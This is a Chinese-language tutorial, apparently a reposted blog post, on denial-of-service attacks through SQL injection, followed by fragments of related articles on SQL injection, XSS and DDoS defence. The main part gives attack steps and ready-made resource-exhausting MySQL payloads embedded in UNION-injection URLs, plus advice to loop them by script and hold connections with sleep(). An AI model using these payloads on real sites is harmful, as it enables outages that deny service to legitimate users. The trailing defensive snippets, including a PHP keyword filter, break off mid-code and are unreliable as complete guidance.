通过SQL注入实施DDOS攻击的方法

在这之前,我先介绍一下此方法的思路和原理,以便让大家更好地理解这种攻击方法。我们知道,如果一个网站存在sql注入漏洞,那么我们就能让网站数据库执行我们的sql语句,并得到相应的输出(当然,有些情况下是没有回显的)。所以我们有了一个思路:构造一条足够复杂的sql语句,让数据库去执行,以此来消耗Web服务和数据库的资源,耗尽服务器资源,我们甚至也可以让数据库达到其最大连接数,让数据库不能再去回应其它合法用户的连接请求。

目前,整个思路已经很清晰了,我们可以开始构造复杂的sql语句了。

sql为我们提供了许多函数,允许我们构造足够复杂的语句来用一个极其复杂的方法去得到相应的输出结果,例如join(), like(), compress(),encode()函数等。

我们将采用以下步骤完成我们的攻击:

1. 找到一个存在注入漏洞的站点。

2. 构造我们的sql注入语句

3. 对目标网站实施sql DDOS攻击

如何寻找sql注入漏洞和构造sql语句,我之前的文章已经详细地讲过了,你可以去阅读一下。我这里假设你已经具备了相应的知识,然后继续我们的讨论。

向网站注入我们的DDOS查询语句

有许多方法可以做到这一点,你需要的是你的大脑,还有一个用来测试的网站。接着,我们来构造致命的sql语句吧。

我创建了一个500行的表,每一个字段含有500字节的数据,这实际上代表了一些论坛,博客网站的数据量。如果数据库更大一些,我们就可以找到更多数据库运行的缺陷,对这类网站实施DDOS攻击更容易成功。

我们将使用下面的payload去实施DDOS攻击,我花费了好几个小时来构造这些payload:

select tab1 from (select decode(encode(convert(compress(post) using latin1),concat(post,post,post,post)),sha1(concat(post,post,post,post))) as tab1 from table_1)a;

select tab1 from (select decode(encode(convert(compress(post) using latin1),des_encrypt(concat(post,post,post,post),8)),des_encrypt(sha1(concat(post,post,post,post)),9)) as tab1 from table_1)a;

假设这是我们所找到的存在sql注入漏洞的网站,且注入语句如下:

http://exploitable-web.com/link.php?id=1‘ union select 1,2,3,4--

我们假设第3个字段可以用来回显,我们把我们第二个payload放到第三个字段处。

http://exploitable-web.com/link.php?id=1‘ union select 1,2,(select tab1 from (select decode(encode(convert(compress(post) using latin1),des_encrypt(concat(post,post,post,post),8)),des_encrypt(sha1(concat(post,post,post,post)),9)) as tab1 from table_1)a),4--

或者

http://exploitable-web.com/link.php?id=1‘ union select 1,2,tab1,4 from (select decode(encode(convert(compress(post) using latin1),des_encrypt(concat(post,post,post,post),8)),des_encrypt(sha1(concat(post,post,post,post)),9)) as tab1 from table_1)a--

接着,我们可以写一个脚本,不断地将这条查询语句发送给网站数据库,利用这种方法,我们仅通过一个普通的连接就可以使网站瘫痪了。使用这种方法进行DDOS攻击时,我们并不需要成千上万的肉鸡。

我们也可以使用sleep语句来保持我们与网站的连接,同样达到DDOS攻击的效果。在asp.net中,默认在30秒内最多同时允许100条连接,我们可以使用sleep()持久地保持我们与网站之间的连接(可以使用脚本同时进行多条连接),这样服务器就不能正常去响应其它用户的请求。

好了,本文到这就结束了。

时间: 2024-11-05 14:46:27

通过SQL注入实施DDOS攻击的方法的相关文章

防止sql注入。xss攻击 方法

//防止sql注入.xss攻击    /**     * 过滤参数     * @param string $str 接受的参数     * @return string     */    public function actionFilterWords($str)    {        $farr = array(            "/<(\\)(script|i?frame|style|html|body|title|link|meta|object|\\?|\\%)([^

SQL 注入、XSS 攻击、CSRF 攻击

SQL 注入.XSS 攻击.CSRF 攻击 SQL 注入 什么是 SQL 注入 SQL 注入,顾名思义就是通过注入 SQL 命令来进行攻击,更确切地说攻击者把 SQL 命令插入到 web 表单或请求参数的查询字符串里面提交给服务器,从而让服务器执行编写的恶意的 SQL 命令. 对于 web 开发者来说,SQL 注入已然是非常熟悉的,而且 SQL 注入已经生存了 10 多年,目前已经有很成熟的防范方法,所以目前的 web 应用都很少会存在漏洞允许进行 SQL 注入攻击. 除非是入门开发人员,在开发

防止SQL注入和XSS攻击Filter

nbsp;今天系统使用IBM的安全漏洞扫描工具扫描出一堆漏洞,下面的filter主要是解决防止SQL注入和XSS攻击 一个是Filter负责将请求的request包装一下. 一个是request包装器,负责过滤掉非法的字符. 将这个过滤器配置上以后,世界总算清净多了.. 代码如下: import java.io.IOException; import javax.servlet.Filter; import javax.servlet.FilterChain; import javax.serv

Linux系统采用netstat命令查看DDOS攻击的方法

Linux系统采用netstat命令查看DDOS攻击的方法 来源:互联网 作者:佚名 时间:07-05 15:10:21 [大 中 小] 这篇文章主要为大家介绍了Linux系统采用netstat命令查看DDOS攻击的方法,对于网络安全而言非常重要!需要的朋友可以参考下 Linux系统用netstat命令查看DDOS攻击具体命令用法如下: 复制代码 代码如下: netstat -na 显示所有连接到服务器的活跃的网络连接 复制代码 代码如下: netstat -an | grep :80 | so

查看服务器是否被DDOS攻击的方法

伴随着现代互联网络快速发展,更加容易出现被攻击.尤其是ddos攻击已经不在是大网站需要关心的事情了.不少中小型企业,也在遭受ddos攻击.站长对ddos攻击不了解,所以网站被ddos攻击的时候,都不会轻易发现,最后导致的网站不能正常运行.站长们要怎样让自己的网站免去ddos攻击烦恼,以及如何查看服务器是否被ddos攻击,下面就来了解一下,如何查看服务器是否被ddos攻击吧. 服务器的攻击分为四类,cc攻击.syn攻击.udp攻击.tcp洪水攻击.那么当被攻击时会出现哪些症状呢,我们是如何来判断服

C#和SQl 注入字符串的攻击 和 防止注入字符转的攻击

--SQl中 --建立ren的数据库,插入一条信息 create database ren go use ren go create table xinxi ( code nvarchar(20) primary key,--编号 name nvarchar(50)--名字 ) insert into xinxi values('1001','zhangsan') for (; ; ) { bool b = false;//利用中间变量 Console.Write("请输入要修改的编号:&quo

网站服务器防止DDOS攻击的方法

1.保证服务器系统的安全首先要确保服务器软件没有任何漏洞,防止攻击者入侵.确保服务器采用最新系统,并打上安全补丁.在服务器上删除未使用的服务,关闭未使用的端口.对于服务器上运行的网站,确保其打了最新的补丁,没有安全漏洞. 2.隐藏服务器真实IP服务器前端加CDN中转(免费的有百度云加速.360网站卫士.加速乐.安全宝等),如果资金充裕的话,可以购买高防的盾机,用于隐藏服务器真实IP,域名解析使用CDN的IP,所有解析的子域名都使用CDN的IP地址.此外,服务器上部署的其他域名也不能使用真实IP解

sql注入,xss攻击,csrf(模拟请求)

如何防止别人模拟请求? 使用令牌token解决模拟请求  好处是 唯一性只能有一次请求 如何拿到如何生成token  改如何防止呢? 使用验证码 xss攻击? xss攻击也叫脚本注入 为什么会才生xss攻击? 提交了<script></script>标签 怎么解决xss攻击 將脚本转换成html进行展示 原文地址:https://www.cnblogs.com/zhouwen2017/p/10516900.html

输入值/表单提交参数过滤有效防止sql注入的方法

输入值/表单提交参数过滤,防止sql注入或非法攻击的方法: 代码如下: /** * 过滤sql与php文件操作的关键字 * @param string $string * @return string * @author zrp <[email protected]> */ private function filter_keyword( $string ) { $keyword = select|insert|update|delete|\|\/\*|\*|\.\.\/|\.\/|union